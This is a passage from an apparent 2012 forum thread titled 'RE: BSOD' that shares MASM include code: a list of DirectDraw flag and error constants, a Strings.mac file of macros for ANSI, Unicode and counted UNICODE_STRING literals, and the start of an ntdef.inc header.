000000004h DDSCAPS_COMPLEX = 000000008h DDSCAPS_FLIP = 000000010h DDSCAPS_FRONTBUFFER = 000000020h DDSCAPS_OFFSCREENPLAIN = 000000040h DDSCAPS_OVERLAY = 000000080h DDSCAPS_PALETTE = 000000100h DDSCAPS_PRIMARYSURFACE = 000000200h DDSCAPS_PRIMARYSURFACELEFT = 000000400h DDSCAPS_SYSTEMMEMORY = 000000800h DDSCAPS_TEXTURE = 000001000h DDSCAPS_3DDEVICE = 000002000h DDSCAPS_VIDEOMEMORY = 000004000h DDSCAPS_VISIBLE = 000008000h DDSCAPS_WRITEONLY = 000010000h DDSCAPS_ZBUFFER = 000020000h DDSCAPS_OWNDC = 000040000h DDSCAPS_LIVEVIDEO = 000080000h DDSCAPS_HWCODEC = 000100000h DDSCAPS_MODEX = 000200000h DDSCAPS_MIPMAP = 000400000h DDSCAPS_RESERVED2 = 000800000h DDSCAPS_ALLOCONLOAD = 004000000h DDSCAPS_VIDEOPORT = 008000000h DDSCAPS_LOCALVIDMEM = 010000000h DDSCAPS_NONLOCALVIDMEM = 020000000h DDSCAPS_STANDARDVGAMODE = 040000000h DDSCAPS_OPTIMIZED = 080000000h DDLOCK_SURFACEMEMORYPTR = 000000000h DDLOCK_WAIT = 000000001h DDLOCK_EVENT = 000000002h DDLOCK_READONLY = 000000010h DDLOCK_WRITEONLY = 000000020h DDLOCK_NOSYSLOCK = 000000800h DDPCAPS_4BIT = 000000001h DDPCAPS_8BITENTRIES = 000000002h DDPCAPS_8BIT = 000000004h DDPCAPS_INITIALIZE = 000000008h DDPCAPS_PRIMARYSURFACE = 000000010h DDPCAPS_PRIMARYSURFACELEFT = 000000020h DDPCAPS_ALLOW256 = 000000040h DDPCAPS_VSYNC = 000000080h DDPCAPS_1BIT = 000000100h DDPCAPS_2BIT = 000000200h DDERR_ALREADYINITIALIZED = 088760000h+5 DDERR_CANNOTATTACHSURFACE = 088760000h+10 DDERR_CANNOTDETACHSURFACE = 088760000h+20 DDERR_CURRENTLYNOTAVAIL = 088760000h+40 DDERR_EXCEPTION = 088760000h+55 DDERR_HEIGHTALIGN = 088760000h+90 DDERR_INCOMPATIBLEPRIMARY = 088760000h+95 DDERR_INVALIDCAPS = 088760000h+100 DDERR_INVALIDCLIPLIST = 088760000h+110 DDERR_INVALIDMODE = 088760000h+120 DDERR_INVALIDOBJECT = 088760000h+130 DDERR_INVALIDPIXELFORMAT = 088760000h+145 DDERR_INVALIDRECT = 088760000h+150 DDERR_LOCKEDSURFACES = 088760000h+160 DDERR_NO3D = 088760000h+170 DDERR_NOALPHAHW = 088760000h+180 DDERR_NOCLIPLIST = 088760000h+205 DDERR_NOCOLORCONVHW = 
088760000h+210 DDERR_NOCOOPERATIVELEVELSET = 088760000h+212 DDERR_NOCOLORKEY = 088760000h+215 DDERR_NOCOLORKEYHW = 088760000h+220 DDERR_NODIRECTDRAWSUPPORT = 088760000h+222 DDERR_NOEXCLUSIVEMODE = 088760000h+225 DDERR_NOFLIPHW = 088760000h+230 DDERR_NOGDI = 088760000h+240 DDERR_NOMIRRORHW = 088760000h+250 DDERR_NOTFOUND = 088760000h+255 DDERR_NOOVERLAYHW = 088760000h+260 DDERR_NORASTEROPHW = 088760000h+280 DDERR_NOROTATIONHW = 088760000h+290 DDERR_NOSTRETCHHW = 088760000h+310 DDERR_NOT4BITCOLOR = 088760000h+316 DDERR_NOT4BITCOLORINDEX = 088760000h+317 DDERR_NOT8BITCOLOR = 088760000h+320 DDERR_NOTEXTUREHW = 088760000h+330 DDERR_NOVSYNCHW = 088760000h+335 DDERR_NOZBUFFERHW = 088760000h+340 DDERR_NOZOVERLAYHW = 088760000h+350 DDERR_OUTOFCAPS = 088760000h+360 DDERR_OUTOFVIDEOMEMORY = 088760000h+380 DDERR_OVERLAYCANTCLIP = 088760000h+382 DDERR_OVERLAYCOLORKEYONLYONEACTI = 088760000h+384 DDERR_PALETTEBUSY = 088760000h+387 DDERR_COLORKEYNOTSET = 088760000h+400 DDERR_SURFACEALREADYATTACHED = 088760000h+410 DDERR_SURFACEALREADYDEPENDENT = 088760000h+420 DDERR_SURFACEBUSY = 088760000h+430 DDERR_CANTLOCKSURFACE = 088760000h+435 DDERR_SURFACEISOBSCURED = 088760000h+440 DDERR_SURFACELOST = 088760000h+450 DDERR_SURFACENOTATTACHED = 088760000h+460 DDERR_TOOBIGHEIGHT = 088760000h+470 DDERR_TOOBIGSIZE = 088760000h+480 DDERR_TOOBIGWIDTH = 088760000h+490 DDERR_UNSUPPORTEDFORMAT = 088760000h+510 DDERR_UNSUPPORTEDMASK = 088760000h+520 DDERR_VERTICALBLANKINPROGRESS = 088760000h+537 DDERR_WASSTILLDRAWING = 088760000h+540 DDERR_XALIGN = 088760000h+560 DDERR_INVALIDDIRECTDRAWGUID = 088760000h+561 DDERR_DIRECTDRAWALREADYCREATED = 088760000h+562 DDERR_NODIRECTDRAWHW = 088760000h+563 DDERR_PRIMARYSURFACEALREADYEXIST = 088760000h+564 DDERR_NOEMULATION = 088760000h+565 DDERR_REGIONTOOSMALL = 088760000h+566 DDERR_CLIPPERISUSINGHWND = 088760000h+567 DDERR_NOCLIPPERATTACHED = 088760000h+568 DDERR_NOHWND = 088760000h+569 DDERR_HWNDSUBCLASSED = 088760000h+570 DDERR_HWNDALREADYSET = 088760000h+571 
DDERR_NOPALETTEATTACHED = 088760000h+572 DDERR_NOPALETTEHW = 088760000h+573 DDERR_BLTFASTCANTCLIP = 088760000h+574 DDERR_NOBLTHW = 088760000h+575 DDERR_NODDROPSHW = 088760000h+576 DDERR_OVERLAYNOTVISIBLE = 088760000h+577 DDERR_NOOVERLAYDEST = 088760000h+578 DDERR_INVALIDPOSITION = 088760000h+579 DDERR_NOTAOVERLAYSURFACE = 088760000h+580 DDERR_EXCLUSIVEMODEALREADYSET = 088760000h+581 DDERR_NOTFLIPPABLE = 088760000h+582 DDERR_CANTDUPLICATE = 088760000h+583 DDERR_NOTLOCKED = 088760000h+584 DDERR_CANTCREATEDC = 088760000h+585 DDERR_NODC = 088760000h+586 DDERR_WRONGMODE = 088760000h+587 DDERR_IMPLICITLYCREATED = 088760000h+588 DDERR_NOTPALETTIZED = 088760000h+589 DDERR_UNSUPPORTEDMODE = 088760000h+590 DDERR_NOMIPMAPHW = 088760000h+591 DDERR_INVALIDSURFACETYPE = 088760000h+592 DDERR_NOOPTIMIZEHW = 088760000h+600 DDERR_NOTLOADED = 088760000h+601 DDERR_DCALREADYCREATED = 088760000h+620 DDERR_NONONLOCALVIDMEM = 088760000h+630 DDERR_CANTPAGELOCK = 088760000h+640 DDERR_CANTPAGEUNLOCK = 088760000h+660 DDERR_NOTPAGELOCKED = 088760000h+680 DDERR_MOREDATA = 088760000h+690 DDERR_VIDEONOTACTIVE = 088760000h+695 DDERR_DEVICEDOESNTOWNSURFACE = 088760000h+699 ; ---------------------------------- END_CODE ---------------------------; [sm=aj.gif][sm=dv.gif]


RE: BSOD - 2012-02-12 00:32:55.860000   
Elisaveta

Strings.mac

; ------------------- Strings.mac --------------------; IFDEF UNICODE IF UNICODE NE 0 STRING equ STRINGW ELSE STRING equ STRINGA ENDIF ELSE STRING equ STRINGA ENDIF STRINGA MACRO _s_, a:=&lt;1&gt; local txt, c, bslash, lq, sc txt TEXTEQU &lt;&gt; bslash = 0 lq = 0 sc = 0 ALIGN a sText SUBSTR &lt;_s_&gt;, 2, @SizeStr(&lt;_s_&gt;) - 2 % FORC cha, &lt;sText&gt; IF bslash bslash = 0 IF "&cha" EQ "\" IF sc txt CATSTR txt, &lt;,&gt; sc = 0 ENDIF IF lq txt CATSTR txt, &lt;&cha&gt; ELSE txt CATSTR txt, &lt;"&gt;, &lt;&cha&gt; lq = 1 ENDIF ELSE IF lq txt CATSTR txt, &lt;"&gt; lq = 0 sc = 1 ENDIF IF sc txt CATSTR txt, &lt;,&gt; ENDIF IF "&cha" EQ "n" txt CATSTR txt, &lt;0Dh,0Ah&gt; ELSEIF "&cha" EQ ":" ;; \: = ! txt CATSTR txt, &lt;21h&gt; ELSEIF "&cha" EQ "{" ;; \{ = ( txt CATSTR txt, &lt;28h&gt; ELSEIF "&cha" EQ "}" ;; \} = ) txt CATSTR txt, &lt;29h&gt; ELSEIF "&cha" EQ "[" ;; \[ = &lt; txt CATSTR txt, &lt;3Ch&gt; ELSEIF "&cha" EQ "]" ;; \] = &gt; txt CATSTR txt, &lt;3Eh&gt; ELSEIF "&cha" EQ "=" ;; \= = " txt CATSTR txt, &lt;22h&gt; ELSEIF "&cha" EQ "0" ;; \0 = 0 txt CATSTR txt, &lt;0h&gt; ELSEIF "&cha" EQ "r" ;; \r = CR txt CATSTR txt, &lt;0Dh&gt; ELSEIF "&cha" EQ "l" ;; \l = LF txt CATSTR txt, &lt;0Ah&gt; ELSEIF "&cha" EQ "t" ;; \t = TAB txt CATSTR txt, &lt;9h&gt; ENDIF sc = 1 ENDIF ELSE IF "&cha" EQ "\" bslash = 1 ELSE IF sc txt CATSTR txt, &lt;,&gt; sc = 0 ENDIF IF lq txt CATSTR txt, &lt;&cha&gt; ELSE txt CATSTR txt, &lt;"&gt;, &lt;&cha&gt; lq = 1 ENDIF ENDIF ENDIF ENDM IF lq txt CATSTR txt, &lt;"&gt; ENDIF EXITM &lt;txt&gt; ENDM STRINGW MACRO _s_, a:=&lt;2&gt; local txt, c, bslash, lq, sc txt TEXTEQU &lt;&gt; bslash = 0 lq = 0 sc = 0 IF a LT 2 ALIGN 2 ELSE ALIGN a ENDIF ;; remove quotation marks sText SUBSTR &lt;_s_&gt;, 2, @SizeStr(&lt;_s_&gt;) - 2 % FORC cha, &lt;sText&gt; IF bslash bslash = 0 IF "&cha" EQ "\" IF sc txt CATSTR txt, &lt;,&gt; sc = 0 ENDIF txt CATSTR txt, &lt;"&cha"&gt; sc = 1 ELSE IF lq txt CATSTR txt, &lt;"&gt; lq = 0 sc = 1 ENDIF IF sc txt CATSTR 
txt, &lt;,&gt; ENDIF IF "&cha" EQ "n" ;; \n = CR, LF txt CATSTR txt, &lt;0Dh,0Ah&gt; ELSEIF "&cha" EQ ":" ;; \: = ! txt CATSTR txt, &lt;21h&gt; ELSEIF "&cha" EQ "{" ;; \{ = ( txt CATSTR txt, &lt;28h&gt; ELSEIF "&cha" EQ "}" ;; \} = ) txt CATSTR txt, &lt;29h&gt; ELSEIF "&cha" EQ "[" ;; \[ = &lt; txt CATSTR txt, &lt;3Ch&gt; ELSEIF "&cha" EQ "]" ;; \] = &gt; txt CATSTR txt, &lt;3Eh&gt; ELSEIF "&cha" EQ "=" ;; \= = " txt CATSTR txt, &lt;22h&gt; ELSEIF "&cha" EQ "0" ;; \0 = 0 txt CATSTR txt, &lt;0&gt; ELSEIF "&cha" EQ "r" ;; \r = CR txt CATSTR txt, &lt;0Dh&gt; ELSEIF "&cha" EQ "l" ;; \l = LF txt CATSTR txt, &lt;0Ah&gt; ELSEIF "&cha" EQ "t" ;; \t = TAB txt CATSTR txt, &lt;9h&gt; ENDIF sc = 1 ENDIF ELSE IF "&cha" EQ "\" bslash = 1 ELSE IF sc txt CATSTR txt, &lt;,&gt; sc = 0 ENDIF txt CATSTR txt, &lt;"&cha"&gt; sc = 1 ENDIF ENDIF ENDM EXITM &lt;txt&gt; ENDM TA MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln) ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM CTA MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln) ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS 
sn SEGMENT ENDM TW MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln) ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM CTW MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln) ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM T MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 TW txt, amnesia, iasemna ELSE TA txt, amnesia, iasemna ENDIF ELSE TA txt, amnesia, iasemna ENDIF ENDM CT MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 CTW txt, amnesia, iasemna ELSE CTA txt, amnesia, iasemna ENDIF ELSE CTA txt, amnesia, iasemna ENDIF ENDM $TA MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d db 
STRINGA(&lt;txt&gt;, aln) ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $CTA MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln) ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $TW MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln) ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $CTW MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln) ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $T MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 EXITM $TW(txt, amnesia, 
iasemna) ELSE EXITM $TA(txt, amnesia, iasemna) ENDIF ELSE EXITM $TA(txt, amnesia, iasemna) ENDIF ENDM $CT MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 EXITM $CTW(txt, amnesia, iasemna) ELSE EXITM $CTA(txt, amnesia, iasemna) ENDIF ELSE EXITM $CTA(txt, amnesia, iasemna) ENDIF ENDM TA0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM TW0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM T0 MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 TW0 txt, amnesia, iasemna ELSE TA0 txt, amnesia, iasemna ENDIF ELSE TA0 txt, amnesia, iasemna ENDIF ENDM CTA0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU 
%iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM CTW0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT ENDM CT0 MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 CTW0 txt, amnesia, iasemna ELSE CTA0 txt, amnesia, iasemna ENDIF ELSE CTA0 txt, amnesia, iasemna ENDIF ENDM $TA0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $TW0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU 
&lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $T0 MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 EXITM $TW0(txt, amnesia, iasemna) ELSE EXITM $TA0(txt, amnesia, iasemna) ENDIF ELSE EXITM $TA0(txt, amnesia, iasemna) ENDIF ENDM $CTA0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;1&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d db STRINGA(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d db 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $CTW0 MACRO txt, amnesia, iasemna local d, aln, sn sn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label d TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label d TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) d dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln d dw 0 ENDIF @CurSeg ENDS sn SEGMENT EXITM &lt;offset d&gt; ENDM $CT0 MACRO txt, amnesia, iasemna IFDEF UNICODE IF UNICODE NE 0 EXITM $CTW0(txt, amnesia, iasemna) ELSE EXITM $CTA0(txt, amnesia, iasemna) ENDIF ELSE EXITM $CTA0(txt, amnesia, iasemna) ENDIF ENDM IFNDEF UNICODE_STRING UNICODE_STRING STRUCT iLength WORD ? MaximumLength WORD ? Buffer DWORD ? 
UNICODE_STRING ENDS PUNICODE_STRING typedef PTR UNICODE_STRING ENDIF COUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna local dum, segn, us segn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label us TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label us TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) dum dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln dum dw 0 ENDIF ALIGN 4 us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum} @CurSeg ENDS segn SEGMENT ENDM CCOUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna local dum, segn, us segn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label us TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label us TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) dum dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln dum dw 0 ENDIF ALIGN 4 us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum} @CurSeg ENDS segn SEGMENT ENDM $COUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna local dum, segn, us segn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label us TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label us TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .data IF @SizeStr(&lt;txt&gt;) dum dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln dum 
dw 0 ENDIF ALIGN 4 us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum} @CurSeg ENDS segn SEGMENT EXITM &lt;offset us&gt; ENDM $CCOUNTED_UNICODE_STRING MACRO txt, amnesia, iasemna local dum, segn, us segn TEXTEQU @CurSeg aln TEXTEQU &lt;2&gt; IFNB &lt;amnesia&gt; IF (OPATTR (amnesia)) AND 00000100y ;; yes -&gt; amnesia is alignment aln TEXTEQU %amnesia ELSE ;; no -&gt; amnesia is label us TEXTEQU &lt;amnesia&gt; ENDIF ENDIF IFNB &lt;iasemna&gt; IF (OPATTR (iasemna)) AND 00000100y ;; yes -&gt; iasemna is alignment aln TEXTEQU %iasemna ELSE ;; no -&gt; iasemna is label us TEXTEQU &lt;iasemna&gt; ENDIF ENDIF .const IF @SizeStr(&lt;txt&gt;) dum dw STRINGW(&lt;txt&gt;, aln), 0 ELSE ALIGN aln dum dw 0 ENDIF ALIGN 4 us UNICODE_STRING {(sizeof dum)-2, sizeof dum, offset dum} @CurSeg ENDS segn SEGMENT EXITM &lt;offset us&gt; ENDM
ntdef.inc

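; ---------------------------------------------------------------------------
; ntdef.inc -- basic NT type aliases, structures and object-attribute helpers
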